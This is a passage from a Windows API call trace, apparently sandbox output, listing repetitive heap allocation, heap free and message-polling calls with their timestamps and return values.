lpMsg=0x87f89c) returned 0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.511] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.511] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.512] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.512] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d5a8 | out: hHeap=0x8a0000) returned 1 [0155.512] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d568 | out: hHeap=0x8a0000) returned 1 [0155.513] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0155.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42) returned 0x9aa4a8 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1850 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e2a10 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x84) returned 0x8e27f0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9da8 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9dc0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9dd8 [0155.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9da8 | out: hHeap=0x8a0000) returned 1 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9da8 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9df0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e08 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e20 [0155.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9df0 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e50 [0155.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e68 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0155.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0155.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0155.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e80 [0155.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e98 [0155.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9eb0 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e80 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ec8 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f10 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba030 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba108 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba150 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba198 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1e0 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2b8 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba300 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba348 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0155.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0155.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba468 | out: hHeap=0x8a0000) returned 1 [0155.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0155.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0155.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.515] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.516] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.517] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: 